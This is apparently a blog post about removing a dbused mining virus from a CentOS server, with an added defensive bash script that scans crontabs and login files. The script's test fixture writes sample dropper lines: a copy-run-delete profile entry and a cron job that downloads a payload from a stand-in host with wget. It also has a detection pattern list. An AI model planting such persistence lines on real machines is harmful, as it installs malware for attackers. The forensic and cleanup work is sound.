dbused fills up my CPU! Solution process of linux server mining virus

Symptom

Today, when logging in to the remote CentOS server with an SSH key as the ordinary user tung, the connection was extremely sluggish. Once in, I found that the CPU was being eaten by a process named dbused.
[Screenshot: top output, with the CPU occupied by a process named dbused]
After rebooting the server and logging in as root, the CPU was normal. top showed no dbused, but a bash process and a wget command belonging to the tung user kept appearing from time to time. The tung user was not logged in, yet that user's commands were being run periodically, which struck me as very strange.

Then, as soon as I logged in as tung, dbused was executed immediately and the whole CPU was occupied again. So the start of the dbused process also seems closely tied to the login activity of the user tung.

Solution process

1) Stop the bash and wget processes that run under tung while the user is not logged in

Since the tung user was running bash and wget from time to time, I suspected a scheduled task. I disabled automatic startup of crond with systemctl disable crond, restarted the server with reboot and logged in as root. After that, no processes or commands under the tung user appeared any more.

crond is the scheduled-task service; the related commands are:
systemctl start   crond    # start the service
systemctl stop    crond    # stop the service
systemctl restart crond    # restart the service
systemctl reload  crond    # reload the configuration
systemctl status  crond    # show the crontab service status
systemctl enable  crond    # enable automatic start at boot
systemctl disable crond    # disable automatic start at boot

Going into the scheduled-task directory /var/spool/cron/, I found that there was indeed a crontab for the tung user, so I simply deleted it (crontab -r -u tung does the same).
[Screenshot: the tung user's crontab file under /var/spool/cron/]

2) Stop dbused from starting and filling the CPU as soon as a specific user logs in

As soon as you log in as tung, dbused runs automatically and the CPU fills up. Killing it with kill -9 <virus PID> brings things back to normal, but it starts again on the next login.
[Screenshot: top output, with the CPU occupied by a process named dbused]
This shows that the start of this virus is tied to the user's login behaviour. In /home/tung/.bash_profile I found the following abnormal line:
[Screenshot: the malicious line appended to /home/tung/.bash_profile]
After reading that file, something from my earlier attempts made sense: I had located the process's executable at /tmp/dbused, but could not find it under /tmp/. The reason is now clear: this command first copies /tmp/.pwn/bprofr to /tmp/dbused, then executes it and deletes it. In other words, the real source is in this hidden folder (dot-directories only show up with ls -la, and a process whose binary has been removed shows "(deleted)" in ls -l /proc/<PID>/exe).

So I downloaded /tmp/.pwn/bprofr and uploaded it to VirusTotal. Sure enough, it is the malware.
[Screenshot: the VirusTotal report for bprofr]
After deleting it and fixing the .bash_profile file, there was no abnormality when logging in as the user again.

Now I re-enable the scheduled-task service with systemctl enable crond and restart; there is no abnormality after the reboot.
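The two places where this infection persisted (the per-user crontab under /var/spool/cron/ and the login profile in the user's home) can be checked in one pass. The script below is an added example written for this page, not a tool from the original post: it reports suspicious lines in crontab files and in bash login files, and lists processes whose binary has already been unlinked, which is what the "copy to /tmp/dbused, run, delete" chain leaves behind. The pattern list, the sample files and the URL in them are constructed for the demonstration and are assumptions, not data from the incident.

```shell
#!/usr/bin/env bash
# Added triage helper for the two persistence spots found in the write-up:
# per-user crontab files (the /var/spool/cron/ directory) and the login
# profile files in a user's home. It only reads and reports; nothing is
# deleted. The pattern list, the fixture paths and the sample lines are
# assumptions constructed for this example, not taken from the incident.

# Patterns that dropper one-liners tend to contain: downloaders, world-
# writable staging directories, decoding and "copy, run, delete" chains.
SUSPICIOUS_RE='wget|curl|/tmp/|/dev/shm/|/var/tmp/|base64 -d|nohup|chmod \+x|rm -f'

# scan_profile_file FILE: print every non-comment line of FILE that matches
# SUSPICIOUS_RE as FILE:LINENO:line. Returns 0 if something was flagged,
# 1 if the file is clean or unreadable.
scan_profile_file() {
    local f="$1" hits
    [ -r "$f" ] || return 1
    hits=$(grep -nE "$SUSPICIOUS_RE" "$f" | grep -vE '^[0-9]+:[[:space:]]*#') || true
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits" | while IFS= read -r line; do
        printf '%s:%s\n' "$f" "$line"
    done
}

# scan_crontabs DIR: scan every per-user crontab file in DIR
# (/var/spool/cron on CentOS). Returns 0 if any file was flagged.
scan_crontabs() {
    local dir="$1" f found=1
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        if scan_profile_file "$f"; then found=0; fi
    done
    return "$found"
}

# scan_login_files HOME: scan the files bash reads on login/logout.
# Returns 0 if any of them was flagged.
scan_login_files() {
    local home="$1" f found=1
    for f in .bash_profile .bash_login .profile .bashrc .bash_logout; do
        if scan_profile_file "$home/$f"; then found=0; fi
    done
    return "$found"
}

# find_deleted_exes: list running processes whose binary has already been
# unlinked, which is exactly what the "copy to /tmp/dbused, run, delete"
# chain leaves behind. Linux only (needs /proc). Returns 0 if any found.
find_deleted_exes() {
    local p exe found=1
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        case "$exe" in
            *' (deleted)') printf 'PID %s exe %s\n' "${p#/proc/}" "$exe"; found=0 ;;
        esac
    done
    return "$found"
}

# make_fixture: build a throwaway directory tree with constructed sample
# files so the scanners can be exercised offline. Prints the directory.
make_fixture() {
    local d
    d=$(mktemp -d)
    mkdir -p "$d/home/tung" "$d/spool"
    # A stock CentOS .bash_profile plus one appended dropper line of the
    # shape described above (constructed, not the real line from the box).
    cat > "$d/home/tung/.bash_profile" <<'EOF'
# .bash_profile
if [ -f ~/.bashrc ]; then
        . ~/.bashrc
fi
PATH=$PATH:$HOME/.local/bin:$HOME/bin
export PATH
cp /tmp/.pwn/bprofr /tmp/dbused; /tmp/dbused; rm -f /tmp/dbused
EOF
    printf 'export EDITOR=vim\n' > "$d/home/tung/.profile"
    # Constructed crontabs: one that re-fetches a payload, one that is benign.
    printf '*/5 * * * * wget -q -O /tmp/.pwn/bprofr http://example.invalid/p\n' > "$d/spool/tung"
    printf '0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n' > "$d/spool/root"
    printf '%s\n' "$d"
}

# Run against the fixture; on a real host point the scanners at
# /var/spool/cron and the suspect user's home directory instead.
fixture=$(make_fixture)
echo "== per-user crontabs =="
scan_crontabs "$fixture/spool" || echo "(nothing flagged)"
echo "== login files =="
scan_login_files "$fixture/home/tung" || echo "(nothing flagged)"
echo "== processes running from deleted binaries =="
find_deleted_exes || echo "(none)"
rm -rf "$fixture"
```

The pattern list is deliberately broad; on a real server it will also flag legitimate lines that mention curl or /tmp/, so treat the output as a list of lines to read, not a verdict. System-wide entries in /etc/crontab and /etc/cron.d/ are plain files too and can be passed to scan_profile_file directly.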

Summary

  1. If some processes start from time to time when they should not, suspect an abnormal scheduled task. Check the /var/spool/cron/ directory (and /etc/crontab and /etc/cron.d/ as well).
  2. For viruses that are executed automatically when a specific user logs in, check whether the .bash_profile (and .bashrc, .profile) files in the user's home directory are abnormal.
  3. After locating the virus file by whatever means, delete it, together with the persistence that re-fetches it (the cron entry and the profile line); otherwise it comes back.

Open question

This is the second time the server has been hit by a mining virus. The first time it was the kdevtmpfsi virus; things were simpler then, the server used password login, and the password was presumably brute-forced. After that I switched to key-only login and the server was stable for a month, but I do not know why it was infected again; perhaps a service on an open port has a vulnerability. One thing worth checking after a first compromise is whether ~/.ssh/authorized_keys (for tung and for root) contains a key the owner did not add, since such a key survives the switch to key-only login.

I looked up a lot of material while cleaning up the virus. This article helped me the most: Alibaba Cloud server mining program solution process

Origin: blog.csdn.net/gitTung/article/details/114147445